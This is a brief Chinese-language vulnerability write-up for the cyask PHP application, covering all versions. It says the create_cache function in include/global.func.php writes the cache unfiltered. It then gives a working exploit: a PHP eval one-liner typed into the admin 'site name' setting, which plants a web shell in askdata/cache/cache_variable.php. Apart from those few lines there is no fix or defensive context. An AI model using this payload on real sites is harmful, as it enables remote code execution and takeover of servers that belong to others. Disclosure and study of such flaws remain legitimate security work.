涉及系统:
cyask所有版本

漏洞描述:
写cache的时候没有进行过滤

漏洞位置:
include/global.func.php中的create_cache函数

利用方法:
后台参数设置,在网站名称里输入:';?><? eval($_POST[c]);?>

生成的一句话位于:askdata/cache/cache_variable.php